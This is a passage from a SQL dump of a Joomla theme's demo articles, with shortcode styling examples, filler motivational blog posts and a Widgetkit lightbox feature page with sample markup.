elit[/li]\r\n[li icon=\"icon-info-circle\"]sed do eiusmod tempor[/li]\r\n[/list]\r\n[/column]\r\n\r\n[column size=\"1-3\"]\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-check\"]Lorem ipsum dolor[/li]\r\n[li icon=\"icon-check\"]consectetur adipisicing elit[/li]\r\n[li icon=\"icon-check\"]sed do eiusmod tempor[/li]\r\n[/list][/column][/child_grid]\r\n\r\n[child_grid][column size=\"1-3\"]\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-chevron-right\"]Lorem ipsum dolor[/li]\r\n[li icon=\"icon-chevron-right\"]consectetur adipisicing elit[/li]\r\n[li icon=\"icon-chevron-right\"]sed do eiusmod tempor[/li]\r\n[/list]\r\n[/column]\r\n\r\n[column size=\"1-3\"]\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-arrow-circle-right\"]Lorem ipsum dolor[/li]\r\n[li icon=\"icon-arrow-circle-right\"]consectetur adipisicing elit[/li]\r\n[li icon=\"icon-arrow-circle-right\"]sed do eiusmod tempor[/li]\r\n[/list]\r\n[/column]\r\n\r\n[column size=\"1-3\"]\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-caret-right\"]Lorem ipsum dolor[/li]\r\n[li icon=\"icon-caret-right\"]consectetur adipisicing elit[/li]\r\n[li icon=\"icon-caret-right\"]sed do eiusmod tempor[/li]\r\n[/list][/column][/child_grid]\r\n           \r\n      [badge style=\"note uk-margin-top\"]markup[/badge]\r\n      <pre><i>[</i>list style=\"list-icons\"]\r\n   <i>[</i>li icon=\"icon-asterisk\"]List Item 1<i>[</i>/li]\r\n   <i>[</i>li icon=\"icon-asterisk\"]List Item 2<i>[</i>/li]\r\n   <i>[</i>li icon=\"icon-asterisk\"]List Item 3<i>[</i>/li]\r\n<i>[</i>/list]</pre><br/>\r\n      \r\n     [heading size=\"h3\" style=\"dotted\" uk-padding-top\"]Nested Lists[/heading] \r\n     [list style=\"list-icons\"]\r\n      [li icon=\"icon-caret-right\"]Lorem ipsum dolor[/li]\r\n      [li icon=\"icon-caret-right\"]consectetur adipisicing elit[/li]\r\n      [li icon=\"icon-caret-right\"]sed do eiusmod tempor[/li]\r\n      [nested_list]\r\n      [li icon=\"icon-caret-right\"]Lorem ipsum dolor[/li]\r\n      [li icon=\"icon-caret-right\"]consectetur adipisicing elit[/li]\r\n      [li icon=\"icon-caret-right\"]sed do eiusmod tempor[/li]\r\n      [/nested_list]\r\n      [li icon=\"icon-caret-right\"]dolor adipisicing elit[/li]\r\n      [/list]<br/>\r\n      \r\n      [badge style=\"note uk-margin-top\"]markup[/badge]\r\n      <pre><i>[</i>list style=\"list-icons\"]\r\n   <i>[</i>li icon=\"icon-asterisk\"]List Item 1<i>[</i>/li]\r\n   <i>[</i>li icon=\"icon-asterisk\"]List Item 2<i>[</i>/li]\r\n      <i>[</i>nested_list]\r\n         <i>[</i>li icon=\"icon-asterisk\"]Child Item 1<i>[</i>/li]\r\n         <i>[</i>li icon=\"icon-asterisk\"]Child Item 2<i>[</i>/li]\r\n      <i>[</i>/nested_list]\r\n   <i>[</i>li icon=\"icon-asterisk\"]List Item 3<i>[</i>/li]\r\n<i>[</i>/list]</pre>\r\n\r\n<p>[h2 dotted]<strong>Quotations</strong> and Code[/h2]</p>\r\n<p>Inline quotations can be defined by using the <q>&lt;q&gt; element</q>.</p>\r\n<p>[blockquote author=\"\"]The blockquote element defines a long quotation which also creates a new block by inserting white space before and after the blockquote element. This is an <strong>emphasis</strong> within the blockquote[/blockquote]</p>\r\n<p>To use the blockquote style create a paragraph in the following format</p>\r\n<pre><i>[</i>blockquote author=\"name\"]some content here [/blockquote]</pre>\r\n<p>To define a short inline computer code use the <code>&lt;code&gt; element</code>. For a larger code snippet use the &lt;pre&gt; element which defines preformatted text. It creates a new text block which preserves both spaces and line breaks.</p>\r\n<pre>pre {\r\n    margin: 15px 0;\r\n    padding: 10px;\r\n    font-family: \"Courier New\", Courier, monospace;\r\n    font-size: 12px;\r\n    line-height: 18px;\r\n    white-space: pre-wrap;\r\n}\r\n</pre>\r\n<p><small>Use the &lt;small&gt; element for side comments and small print.</small></p>\r\n<hr />\r\n<p>[h2 dotted]<strong>Block</strong> Numbers and Events[/h2]</p>\r\n<p>[row][column one-half]</p>\r\n<p>[block-number]1[/block-number] Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum.</p>\r\n<p>[block-number]2[/block-number] Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum.</p>\r\n<p>[block-number]3[/block-number] Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum.</p>\r\n<p>[/column]</p>\r\n<p>[column one-half]</p>\r\n<p>[event 03:dec] Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum.[/event]</p>\r\n<p>[event 12:apr] Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum.[/event]</p>\r\n<p>[event 30:may] Tempor invidunt ut labore et dolore magna aliquyam erat, sed diam voluptua. At vero eos et accusam et justo duo dolores et ea rebum.[/event]</p>\r\n<p>[/column][/row]</p>\r\n<p>To use the block number style create a paragraph in the following format</p>\r\n<pre>[<em>block-number</em>]{number}[<em>/block-number</em>]</pre>\r\n<p>To use the event-time block style create a paragraph in the following format</p>\r\n<pre>[<em>event 03:dec</em>] your description here[<em>/event</em>]</pre>\r\n<p class=\"dotted\">[h2 dotted]<strong>Useful</strong> CSS Classes[/h2]</p>\r\n<p>Here is a short demonstration of all style related CSS classes included in this theme.</p>\r\n<p>[h2 dotted]<strong>Highlight</strong> Content[/h2]</p>\r\n<p class=\"dropcap\">[dropcap] Drop caps are the first letter of a paragraph which are displayed bigger than the rest of the text. You can create a drop cap using the CSS class <code>dropcap</code>. To emphasize text with some small boxes use <em class=\"box\">&lt;em&gt; element</em> with the CSS class <code>box</code>.[/dropcap]</p>\r\n\r\n<p>[box info]This is a simple box with useful information using the CSS class [<code>box info</code>]...[<code>/box</code>].[/box]</p>\r\n<p>[box warning]This is a simple box with important notes and warnings using the CSS class [<code>box warning</code>]...[<code>/box</code>].[/box]</p>\r\n<p>[box hint]This is a simple box with additional hints using the CSS class [<code>box hint</code>]...[<code>/box</code>].[/box]</p>\r\n<p>[box download]This is a simple box with download information using the CSS class [<code>box download</code>]...[<code>/box</code>].[/box]</p>\r\n<p>Use the CSS class <code>dotted</code> to create a dotted horizontal rule.</p>\r\n<hr class=\"dotted\" />\r\n<p>[h2 dotted]Tables[/h2]</p>\r\n<p>Create a stripped table using using the CSS class <code>uk-table uk-table-striped</code>.</p>\r\n<table class=\"uk-table uk-table-striped\"><caption>Table caption</caption>\r\n<thead>\r\n<tr><th>Table Heading</th><th>Table Heading</th><th class=\"center\">Table Heading</th></tr>\r\n</thead>\r\n<tfoot>\r\n<tr>\r\n<td>Table Footer</td>\r\n<td>Table Footer</td>\r\n<td class=\"center\">Table Footer</td>\r\n</tr>\r\n</tfoot>\r\n<tbody>\r\n<tr class=\"odd\">\r\n<td>Table Data</td>\r\n<td>Table Data</td>\r\n<td class=\"center\">Data Centered</td>\r\n</tr>\r\n<tr>\r\n<td class=\"bold\">Data Bold</td>\r\n<td>Table Data</td>\r\n<td class=\"center\">Data Centered</td>\r\n</tr>\r\n<tr class=\"odd\">\r\n<td>Table Data</td>\r\n<td>Table Data</td>\r\n<td class=\"center\">Data Centered</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[h2 dotted]<strong>Definition</strong> Lists[/h2]</p>\r\n<p>Create a nice looking definition list separated with a line by using the CSS class <code>separator</code>.</p>\r\n<dl class=\"separator\"><dt>Definition List</dt><dd>A definition list is a list of terms and corresponding definitions. To create a definition list use the &lt;dl&gt; element in conjunction with &lt;dt&gt; to define the definition term and &lt;dd&gt; to define the definition description.</dd><dt>Definition Term</dt><dd>This is a definition description.</dd><dt>Definition Term</dt><dd>This is a definition description.</dd><dd>This is another definition description.</dd></dl>\r\n<p>[h2 dotted]<strong>CSS3</strong> Tags[/h2]</p>\r\n<p>Blog Tags are used to highlight keywords or search words in a blog or site content. These tags have been designed with pure CSS3 and additional fallback for older browsers.</p>\r\n<p>[tag url=\"#\"]Joomla[/tag] [tag url=\"#\"]Wordpress[/tag] [tag url=\"#\"]html[/tag] [tag url=\"#\"]envato[/tag] [tag url=\"#\"]themeforest[/tag] [tag url=\"#\"]codecanyon[/tag] [tag url=\"#\"]html5[/tag] [tag url=\"#\"]css3[/tag]</p>\r\n<p>To use the CSS tags in your content use the following format:</p>\r\n<pre><i>[</i>tag url=\"{url}\"]{your tag}[/tag]</pre>\r\n<p>[h2 dotted]Toggles[/h2]</p>\r\n<p>Toggles are a nice way to minimize hidden sections on a page by only showing titles of the hidden text while maximizing on space. This allows the user to only view what he/she is interested in with a sleek slide down/up of the hidden content. A good example on how to use them is FAQs.</p>\r\n<p>[toggle state=\"closed code\" title=\"closed toggle\"][<code>toggle</code> state=\"closed\" title=\"your title\"]your hidden text here[<code>/toggle</code>][/toggle]</p>\r\n<p>[toggle state=\"open code\" title=\"open toggle\"][<code>toggle</code> state=\"open\" title=\"your title\"]your hidden text here[<code>/toggle</code>][/toggle]</p>\r\n<p>[h2 dotted]Buttons[/h2]</p>\r\n<p>[h3 dotted]Normal Button[/h3]</p>\r\n<p>[button href=\"#\"]normal[/button] [button href=\"#\"]default[/button] [button href=\"#\"]This is an expandable button[/button]</p>\r\n<p>To use the buttons in your content use the following format:</p>\r\n<pre><i>[</i>button href=\"#\"]button text[/button]</pre>\r\n<p> </p>\r\n<p>[h3 dotted]Arrow Button[/h3]</p>\r\n<p>[button arrow href=\"#\"]normal[/button] [button arrow href=\"#\"]default[/button] [button arrow href=\"#\"]This is an expandable button[/button]</p>\r\n<p>To use the buttons in your content use the following format:</p>\r\n<pre><i>[</i>button arrow href=\"#\"]button text[/button]</pre>\r\n<p> </p>\r\n<p> </p>\r\n<p>[h3 dotted]Color Button[/h3]</p>\r\n<p>[button color href=\"#\"]normal[/button] [button color href=\"#\"]default[/button] [button color href=\"#\"]This is an expandable button[/button]</p>\r\n<p>To use the buttons in your content use the following format:</p>\r\n<pre><i>[</i>button color href=\"#\"]button text[/button]</pre>\r\n<p>[h2 dotted]Forms[/h2]</p>\r\n<p>Create a clearly arranged form layout with fieldset boxes using the CSS class <code>box</code>.</p>\r\n<form class=\"box style\" action=\"#\"><fieldset><legend>Form legend</legend>\r\n<div><label for=\"f1\">Text input:</label> <input id=\"f1\" type=\"text\" /></div>\r\n<input id=\"yes\" type=\"radio\" name=\"question\" value=\"yes\" checked=\"checked\" /><label>Option 1</label> <input id=\"no\" type=\"radio\" name=\"question\" value=\"no\" /><label>Option 2</label>\r\n<div class=\"rowElem\"><input id=\"chk1\" type=\"checkbox\" name=\"chk1\" checked=\"checked\" /><label>Checkbox 1</label></div>\r\n<div class=\"rowElem\"><input id=\"chk2\" type=\"checkbox\" name=\"chk2\" /><label>Checkbox 2</label></div>\r\n<p class=\"clearfix\"> </p>\r\n<br />\r\n<div><label for=\"f6\">Select field:</label><select id=\"f6\">\r\n<option>Option 01</option>\r\n<option>Option 02</option>\r\n<option>Option 03</option>\r\n<option>Option 04</option>\r\n</select></div>\r\n<p class=\"clearfix\"> </p>\r\n<br /><br />\r\n<div><label for=\"f7\">Textarea:</label><textarea id=\"f7\" rows=\"5\" cols=\"30\">Textarea text</textarea></div>\r\n</fieldset><button class=\"button\">Button</button> <input class=\"button-color\" type=\"button\" value=\"Input Button\" /></form>', '', 1, 2, '2011-05-02 11:47:45', 196, '', '2014-08-05 10:28:17', 42, 0, '0000-00-00 00:00:00', '2011-05-02 11:47:45', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 180, 18, '', '', 1, 1234, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(5, 37, 'Make that idea your life', 'make-that-idea-your-life', '<a data-spotlight=\"on\" data-lightbox=\"on\" href=\"images/demo/blog/blog_1.png\"><img src=\"images/demo/blog/blog_1.png\" alt=\"arrowthemes\" width=\"856\" height=\"315\" /></a>\r\n\r\n<p class=\"dropcap\">Do not dwell in the past, do not dream of the future, concentrate the mind on the present moment. Never be bullied into silence. Never allow yourself to be made a victim. Accept no one\'s definition of your life; define yourself.</p>\r\n\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n\r\n', '\r\n\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.<p>\r\n  \r\n[blockquote author=\"John Doe\"]\r\nBelieve in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.\r\n[/blockquote]\r\n\r\n  <p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 0, 22, '2014-07-25 11:48:00', 196, '', '2014-07-26 07:20:01', 42, 0, '0000-00-00 00:00:00', '2014-07-25 11:48:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 10, 5, '', '', 1, 482, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 1, '*', '', ''),
(8, 40, 'You only live once - Live well', 'you-only-live-once-live-well', '<a data-spotlight=\"on\" data-lightbox=\"transitionIn:elastic; transitionOut:elastic;\" href=\"images/demo/blog/blog_3.png\"><img src=\"images/demo/blog/blog_3.png\" alt=\"arrowthemes\" width=\"856\" height=\"315\" /></a>\r\n\r\n<p class=\"dropcap\">It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy;</p>\r\n\r\n', '\r\n\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.<p>\r\n  \r\n[blockquote author=\"John Doe\"]\r\nBelieve in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.\r\n[/blockquote]\r\n\r\n  <p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 0, 22, '2011-04-12 11:50:02', 196, '', '2014-07-26 07:06:47', 42, 0, '0000-00-00 00:00:00', '2011-04-12 11:50:02', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 37, 2, '', '', 1, 177, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(9, 41, 'Be kind whenever possible', 'be-kind-whenever-possible', '<a data-spotlight=\"on\" data-lightbox=\"transitionIn:elastic; transitionOut:elastic;\" href=\"images/demo/blog/blog_2.png\"><img src=\"images/demo/blog/blog_2.png\" alt=\"arrowthemes\" width=\"856\" height=\"315\" /></a>\r\n\r\n<p class=\"dropcap\">The world owes you nothing. It was here first. Do not dwell in the past, do not dream of the future, concentrate the mind on the present moment. Never be bullied into silence. Never allow yourself to be made a victim.</p>\r\n\r\n', '\r\n\r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n\r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.<p>\r\n  \r\n[blockquote author=\"John Doe\"]\r\nBelieve in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.\r\n[/blockquote]\r\n\r\n  <p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 1, 22, '2011-03-20 11:50:30', 196, '', '2014-07-26 07:07:25', 42, 0, '0000-00-00 00:00:00', '2011-03-20 11:50:30', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 10, 3, '', '', 1, 807, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(11, 43, 'Music is food for the soul', 'music-is-food-for-the-soul', '<br/>\r\n[audio src=\"images/demo/audio/le_festin.mp3\" type=\"audio/mp3\"][/audio]\r\n\r\n<p class=\"dropcap\">Perhaps travel cannot prevent bigotry, but by demonstrating that all peoples cry, laugh, eat, worry, and die, it can introduce the idea that if we try and understand each other, we may even become friends.<p>\r\n\r\n', '\r\n  \r\n<p>Don\'t go around saying the world owes you a living. The world owes you nothing. It was here first. If you don\'t like something, change it. If you can\'t change it, change your attitude. Change will not come if we wait for some other person or some other time. We are the ones we\'ve been waiting for. We are the change that we seek.</p>\r\n  \r\n<p>It is not the strongest of the species that survives, nor the most intelligent that survives. It is the one that is the most adaptable to change. All changes, even the most longed for, have their melancholy; for what we leave behind us is a part of ourselves; we must die to one life before we can enter another.</p>\r\n\r\n[blockquote author=\"unknown\"]\r\nBelieve in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy.\r\n[/blockquote]\r\n  \r\n<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>', 0, 22, '2014-06-10 11:51:00', 196, '', '2014-08-09 07:29:53', 42, 0, '0000-00-00 00:00:00', '2014-06-10 11:51:00', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 9, 4, '', '', 1, 424, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 1, '*', '', '');
INSERT INTO `y57u5_content` (`id`, `asset_id`, `title`, `alias`, `introtext`, `fulltext`, `state`, `catid`, `created`, `created_by`, `created_by_alias`, `modified`, `modified_by`, `checked_out`, `checked_out_time`, `publish_up`, `publish_down`, `images`, `urls`, `attribs`, `version`, `ordering`, `metakey`, `metadesc`, `access`, `hits`, `metadata`, `featured`, `language`, `xreference`, `note`) VALUES
(13, 302, 'Widgetkit', 'widgetkit', '<p>The Widgetkit Lightbox allows you to view images, HTML and multi-media content on a dark dimmed overlay without having to leave the current page.</p>\r\n\r\n[heading size=\"h3\" style=\"module-title\"]Features at a glance[/heading]\r\n\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-check\"]Display images, videos, HTML, Iframes, Ajax requests and SWF[/li]\r\n[li icon=\"icon-check\"]Supports YouTube, Vimeo, MP4 (h.264), WebM and FLV movies[/li]\r\n[li icon=\"icon-check\"]Group lightboxes and mix different content types[/li]\r\n[li icon=\"icon-check\"]Responsive design to fit images great on mobile devices[/li]\r\n[li icon=\"icon-check\"]Load other widgets in lightbox[/li]\r\n[li icon=\"icon-check\"]3 different opening and closing transitions[/li]\r\n[li icon=\"icon-check\"]4 different caption styles[/li]\r\n[li icon=\"icon-check\"]Keyboard and mouse scroll wheel navigation[/li]\r\n[li icon=\"icon-check\"]Build on the latest jQuery version[/li]\r\n[li icon=\"icon-check\"]Works with Joomla and WordPress[/li]\r\n[/list]\r\n\r\n[heading size=\"h3\" style=\"module-title uk-margin-top\"]Examples[/heading]\r\n<p>Different animations - <code>fade, elastic</code> and <code>none</code></p>\r\n<p>[grid][column size=\"1-3\"]<a data-lightbox=\"transitionIn:fade;transitionOut:fade;\" href=\"images/demo/sample_big.jpg\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"165\" /></a>[/column]</p>\r\n<p>[column size=\"1-3\"]<a data-lightbox=\"transitionIn:elastic;transitionOut:elastic;\" href=\"images/demo/sample_big.jpg\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"165\" /></a>[/column]</p>\r\n<p>[column size=\"1-3\"]<a data-lightbox=\"transitionIn:none;transitionOut:none;\" href=\"images/demo/sample_big.jpg\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"165\" /></a>[/column][/grid]</p>\r\n\r\n [badge style=\"note uk-margin-top\"]markup[/badge]\r\n<pre>&lt;a data-lightbox=\"transitionIn:fade; transitionOut:fade;\" href=\"images/demo/sample_big.jpg\"&gt;&lt;img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"165\" /&gt;&lt;/a&gt;</pre>\r\n<p>Different title positions- <code>float</code> and <code>over</code></p>\r\n<p>[grid][column size=\"1-3\"]<a data-lightbox=\"transitionIn:elastic;transitionOut:elastic;titlePosition:float;\" href=\"images/demo/sample_big.jpg\" title=\"Lorem Ipsum is simply dummy text of the printing and typesetting industry\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"165\" /></a>[/column]</p>\r\n<p>[column size=\"1-3\"]<a data-lightbox=\"transitionIn:elastic;transitionOut:elastic;titlePosition:over\" href=\"images/demo/sample_big.jpg\" title=\"Lorem Ipsum is simply dummy text of the printing and typesetting industry\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"165\" /></a>[/column][/grid]</p>\r\n\r\n [badge style=\"note uk-margin-top\"]markup[/badge]\r\n<pre>&lt;a data-lightbox=\"transitionIn:elastic; transitionOut:elastic; titlePosition:float;\" href=\"images/demo/sample_big.jpg\" title=\"Lorem Ipsum is simply dummy text of the printing and typesetting industry\"&gt;&lt;img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"165\" /&gt;&lt;/a&gt;</pre>\r\n<p> </p>\r\n<p>You can use it in a gallery</p>\r\n<p> </p>\r\n<p>[grid][column size=\"1-3\"]<a data-lightbox=\"transitionIn:elastic;transitionOut:elastic;titlePosition:float;group:gallery1\" href=\"images/demo/sample_big.jpg\" title=\"Lorem Ipsum is simply dummy text of the printing and typesetting industry\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"165\" /></a>[/column]</p>\r\n<p>[column size=\"1-3\"]<a data-lightbox=\"transitionIn:elastic;transitionOut:elastic;titlePosition:float;group:gallery1\" href=\"images/demo/sample_big.jpg\" title=\"Lorem Ipsum is simply dummy text of the printing and typesetting industry\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"165\" /></a>[/column]</p>\r\n<p>[column size=\"1-3\"] <a data-lightbox=\"transitionIn:elastic;transitionOut:elastic;titlePosition:float;group:gallery1\" href=\"images/demo/sample_big.jpg\" title=\"Lorem Ipsum is simply dummy text of the printing and typesetting industry\"><img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"165\" /></a>[/column][/grid]</p>\r\n [badge style=\"note uk-margin-top\"]markup[/badge]\r\n<pre>&lt;a data-lightbox=\"transitionIn:elastic; transitionOut:elastic; titlePosition:float; group:gallery1\" href=\"images/demo/sample_big.jpg\" title=\"Lorem Ipsum is simply dummy text of the printing and typesetting industry\"&gt;&lt;img src=\"images/demo/sample.jpg\" alt=\"fade\" width=\"250\" height=\"165\" /&gt;&lt;/a&gt;</pre>\r\n<p>Various examples in one gallery (try also using the keyboard and mouse scroll wheel)</p>\r\n[list style=\"list-icons\"]\r\n[li icon=\"icon-check\"]<a data-lightbox=\"group:media\" href=\"https://www.youtube.com/watch?v=nXCKhbjAves\" title=\"YouTube Video\">YouTube</a>[/li]\r\n[li 